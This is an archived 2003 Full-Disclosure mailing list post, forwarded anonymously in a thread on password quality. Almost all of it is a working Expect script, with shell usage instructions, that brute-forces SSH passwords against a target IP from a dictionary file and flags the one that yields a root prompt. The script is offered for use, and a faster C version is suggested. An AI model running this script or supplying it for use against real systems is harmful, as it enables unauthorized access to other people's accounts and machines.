| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
From: lwc at vapid.ath.cx (Larry W. Cashdollar)
Subject: Password quality?
I have been asked to forward this to the list anonymously.
---------- Forwarded message ----------
Date: Wed, 10 Dec 2003 09:34:31 -0500 (EST)
To: Larry W. Cashdollar <lwc@...id.ath.cx>
Cc: "[X-UNKNOWN] Kristian Köhntopp" <kris@...hntopp.de>
Subject: Re: [Full-Disclosure] Password quality?
Hey guys,
If you want to try the "expect" route, you can use the script below...
but, yes, it is slow...would be much quicker if someone modified a
ssh-client in C ... ;-)
---cut
#!/usr/bin/expect -f
# by anonymous
# dorky way to brute force ssh passwd
# from command prompt do a
# for i in `cat PASSWD_FILE`; do ./ssh_brute.expect $i IPADDRESS >>
# ssh_rezults; done
# where PASSWD_FILE is your dictionary file and IPADDRESS is (duh) the IP
# address
# then run
# grep "SNAGGED" ssh_rezults
set timeout 5
set passwd [lindex $argv 0]
set host [lindex $argv 1]
spawn ssh $host
expect "password:"
send -- "$passwd\n"
expect {
"assword" { exit 0 }
"enied" { exit 0 }
"#" { send_user "SNAGGED $passwd\n" }
timeout { exit 254 }
eof { exit 253 }
}
exit 0
---cut
Powered by blists - more mailing lists